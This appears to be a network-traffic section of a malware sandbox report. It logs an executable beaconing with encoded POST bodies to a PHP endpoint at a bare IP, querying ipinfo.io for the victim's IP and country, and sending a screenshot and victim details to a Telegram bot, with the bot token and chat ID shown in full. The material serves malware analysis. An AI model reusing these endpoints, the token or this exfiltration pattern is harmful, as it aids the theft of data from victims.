                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0
                                                                                                Oct 11, 2024 20:39:30.415366888 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:30 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                98 | 192.168.2.5 | 50083 | 5.42.66.51 | 80
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:39:30.549365044 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:39:30.904395103 CEST | 2544 | OUT | (request body)
                                                                                                Oct 11, 2024 20:39:31.242057085 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:31.376076937 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:31 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                99 | 192.168.2.5 | 50084 | 5.42.66.51 | 80
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:39:30.636822939 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:39:30.982609034 CEST | 2156 | OUT | (request body)
                                                                                                Oct 11, 2024 20:39:31.332906961 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:31.467992067 CEST | 349 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:31 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                100 | 192.168.2.5 | 50085 | 5.42.66.51 | 80
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:39:32.082282066 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:39:32.435601950 CEST | 2156 | OUT | (request body)
                                                                                                Oct 11, 2024 20:39:32.791779995 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:32.921631098 CEST | 349 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:32 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                101 | 192.168.2.5 | 50086 | 5.42.66.51 | 80
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:39:32.564825058 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:39:32.920021057 CEST2552OUTData Raw: 5c 5d 43 5c 5a 58 55 5e 54 57 5b 54 52 5f 57 55 58 56 58 59 5b 5e 55 56 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: \]C\ZXU^TW[TR_WUXVXY[^UV_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.0:3>8==(^%/""5,8$[*(.7^29>)Y>#/+"_$,P,'
                                                                                                Oct 11, 2024 20:39:33.275245905 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:33.403182983 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:33 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                102 | 192.168.2.5 | 50087 | 5.42.66.51 | 80
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:39:33.520337105 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:39:33.873148918 CEST2156OUTData Raw: 59 5f 43 58 5f 52 55 58 54 57 5b 54 52 5a 57 56 58 56 58 5a 5b 55 55 5c 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: Y_CX_RUXTW[TRZWVXVXZ[UU\_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.A$)>+2=&4$Y%"60,+=-P4+)W9>&=4Y-"_$,P,3
                                                                                                Oct 11, 2024 20:39:34.263164997 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:34.384917021 CEST | 349 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:34 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 12 39 5d 21 3f 3f 58 2a 30 3d 51 2e 3a 03 57 31 21 25 06 25 28 37 17 22 29 3c 5c 2e 10 23 1d 31 29 23 12 3d 12 00 57 24 11 01 58 24 11 2b 5d 0d 10 26 5c 26 30 21 00 3d 3b 2c 1c 3a 3e 31 06 24 3d 3a 5c 21 00 2b 18 36 2d 29 5f 26 2f 3b 0f 32 3e 25 57 3f 42 3a 00 2d 2c 33 59 25 04 2f 55 0f 11 38 1c 25 06 28 11 36 2e 33 53 37 06 37 07 37 59 2d 07 23 20 2b 58 31 2a 2f 59 26 2f 39 02 3d 0d 0e 0e 3e 54 29 17 25 2a 2e 0e 2b 32 22 53 2e 00 22 53 0d 32 57 4d 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 989]!??X*0=Q.:W1!%%(7")<\.#1)#=W$X$+]&\&0!=;,:>1$=:\!+6-)_&/;2>%W?B:-,3Y%/U8%(6.3S777Y-# +X1*/Y&/9=>T)%*.+2"S."S2WM0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                103 | 192.168.2.5 | 50088 | 5.42.66.51 | 80
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:39:34.349879980 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:39:34.701384068 CEST2552OUTData Raw: 59 52 43 5f 5f 5d 55 5b 54 57 5b 54 52 5f 57 54 58 51 58 5f 5b 5d 55 57 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: YRC__]U[TW[TR_WTXQX_[]UW_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX-$)?=]%=%<_',15%?Y.#<Z*9W4().:= ]-"_$,P,'
                                                                                                Oct 11, 2024 20:39:35.100614071 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:35.242341995 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:35 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                104 | 192.168.2.5 | 50089 | 5.42.66.51 | 80
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:39:34.957971096 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2128
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:39:35.310625076 CEST2128OUTData Raw: 59 5f 43 51 5a 5a 50 59 54 57 5b 54 52 59 57 53 58 56 58 5b 5b 55 55 57 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: Y_CQZZPYTW[TRYWSXVX[[UUW_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.%*7)9*&3."6//$]>!;1S96*!4Z/;"_$,P,


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                105 | 192.168.2.5 | 50090 | 5.42.66.51 | 80
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:39:35.785021067 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:39:36.138816118 CEST2552OUTData Raw: 59 5d 43 58 5f 5e 50 5e 54 57 5b 54 52 5d 57 53 58 52 58 58 5b 5e 55 5b 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: Y]CX_^P^TW[TR]WSXRXX[^U[_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.3:0Z=8.)4',.5?8?(8U7^!P-==?!$].+"_$,P,/
                                                                                                Oct 11, 2024 20:39:36.579437971 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:36.594669104 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:36 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                106 | 192.168.2.5 | 50091 | 5.42.66.51 | 80
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:39:37.406117916 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:39:37.763725996 CEST2552OUTData Raw: 5c 59 43 51 5f 52 55 5f 54 57 5b 54 52 58 57 52 58 55 58 5b 5b 5b 55 58 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: \YCQ_RU_TW[TRXWRXUX[[[UX_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX-09<=]=*$',:Z#5,/#);2!+>..!*1#:+"_$,P,;
                                                                                                Oct 11, 2024 20:39:38.098081112 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:38.273564100 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:38 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                107 | 192.168.2.5 | 50092 | 5.42.66.51 | 80
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:39:39.259982109 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:39:39.607671976 CEST2552OUTData Raw: 5c 5a 43 51 5f 58 55 54 54 57 5b 54 52 59 57 55 58 56 58 5e 5b 54 55 57 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: \ZCQ_XUTTW[TRYWUXVX^[TUW_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.')/=>=6Z'95/X/3$[(8-Q R.1>2$.;"_$,P,
                                                                                                Oct 11, 2024 20:39:40.351897955 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:40.353585958 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:39 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0
                                                                                                Oct 11, 2024 20:39:40.353708029 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:39 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                0 | 192.168.2.5 | 49704 | 34.117.59.81 | 443 | 4708 | C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-10-11 18:37:11 UTC | 61 | OUT | GET /ip HTTP/1.1
                                                                                                Host: ipinfo.io
                                                                                                Connection: Keep-Alive
                                                                                                2024-10-11 18:37:11 UTC | 305 | IN | HTTP/1.1 200 OK
                                                                                                date: Fri, 11 Oct 2024 18:37:10 GMT
                                                                                                content-type: text/plain; charset=utf-8
                                                                                                Content-Length: 11
                                                                                                access-control-allow-origin: *
                                                                                                via: 1.1 google
                                                                                                strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                Connection: close
                                                                                                2024-10-11 18:37:11 UTC | 11 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                Data Ascii: 8.46.123.33


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                1 | 192.168.2.5 | 49705 | 34.117.59.81 | 443 | 4708 | C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-10-11 18:37:12 UTC | 42 | OUT | GET /country HTTP/1.1
                                                                                                Host: ipinfo.io
                                                                                                2024-10-11 18:37:12 UTC | 448 | IN | HTTP/1.1 200 OK
                                                                                                access-control-allow-origin: *
                                                                                                Content-Length: 3
                                                                                                content-type: text/html; charset=utf-8
                                                                                                date: Fri, 11 Oct 2024 18:37:12 GMT
                                                                                                referrer-policy: strict-origin-when-cross-origin
                                                                                                x-content-type-options: nosniff
                                                                                                x-frame-options: SAMEORIGIN
                                                                                                x-xss-protection: 1; mode=block
                                                                                                via: 1.1 google
                                                                                                strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                Connection: close
                                                                                                2024-10-11 18:37:12 UTC | 3 | IN | Data Raw: 55 53 0a
                                                                                                Data Ascii: US


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                2 | 192.168.2.5 | 49706 | 149.154.167.220 | 443 | 4708 | C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-10-11 18:37:14 UTC | 255 | OUT | POST /bot7829111840:AAGwC163Z3bte6z_YuN643yX5LplCCYUaLM/sendPhoto HTTP/1.1
                                                                                                Content-Type: multipart/form-data; boundary="34997188-a42f-41eb-990d-cfd33339eec7"
                                                                                                Host: api.telegram.org
                                                                                                Content-Length: 86200
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                2024-10-11 18:37:14 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                                                                2024-10-11 18:37:14 UTC40OUTData Raw: 2d 2d 33 34 39 39 37 31 38 38 2d 61 34 32 66 2d 34 31 65 62 2d 39 39 30 64 2d 63 66 64 33 33 33 33 39 65 65 63 37 0d 0a
                                                                                                Data Ascii: --34997188-a42f-41eb-990d-cfd33339eec7
                                                                                                2024-10-11 18:37:14 UTC89OUTData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a
                                                                                                Data Ascii: Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
                                                                                                2024-10-11 18:37:14 UTC10OUTData Raw: 36 39 35 31 33 38 35 33 38 36
                                                                                                Data Ascii: 6951385386
                                                                                                2024-10-11 18:37:14 UTC131OUTData Raw: 0d 0a 2d 2d 33 34 39 39 37 31 38 38 2d 61 34 32 66 2d 34 31 65 62 2d 39 39 30 64 2d 63 66 64 33 33 33 33 39 65 65 63 37 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 61 70 74 69 6f 6e 0d 0a 0d 0a
                                                                                                Data Ascii: --34997188-a42f-41eb-990d-cfd33339eec7Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=caption
                                                                                                2024-10-11 18:37:14 UTC139OUTData Raw: 6e 65 77 20 75 73 65 72 20 63 6f 6e 6e 65 63 74 20 21 0a 49 44 3a 20 63 62 39 66 30 34 66 35 32 35 66 39 65 31 32 39 38 32 39 37 33 34 31 63 33 66 39 30 39 66 64 65 31 33 39 36 66 39 39 37 0a 43 6f 6d 6d 65 6e 74 3a 20 70 72 6f 6c 69 76 20 31 0a 55 73 65 72 6e 61 6d 65 3a 20 61 6c 66 6f 6e 73 0a 50 43 20 4e 61 6d 65 3a 20 31 31 34 31 32 37 0a 49 50 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 0a 47 45 4f 3a 20 55 53 0a
                                                                                                Data Ascii: new user connect !ID: cb9f04f525f9e1298297341c3f909fde1396f997Comment: proliv 1Username: userPC Name: 114127IP: 8.46.123.33GEO: US
                                                                                                2024-10-11 18:37:14 UTC146OUTData Raw: 0d 0a 2d 2d 33 34 39 39 37 31 38 38 2d 61 34 32 66 2d 34 31 65 62 2d 39 39 30 64 2d 63 66 64 33 33 33 33 39 65 65 63 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 70 68 6f 74 6f 3b 20 66 69 6c 65 6e 61 6d 65 3d 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 0d 0a 0d 0a
                                                                                                Data Ascii: --34997188-a42f-41eb-990d-cfd33339eec7Content-Disposition: form-data; name=photo; filename=screenshot.png; filename*=utf-8''screenshot.png
                                                                                                2024-10-11 18:37:14 UTC1580INHTTP/1.1 200 OK
                                                                                                Server: nginx/1.18.0
                                                                                                Date: Fri, 11 Oct 2024 18:37:14 GMT
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 1191
                                                                                                Connection: close
                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                Access-Control-Allow-Origin: *
                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
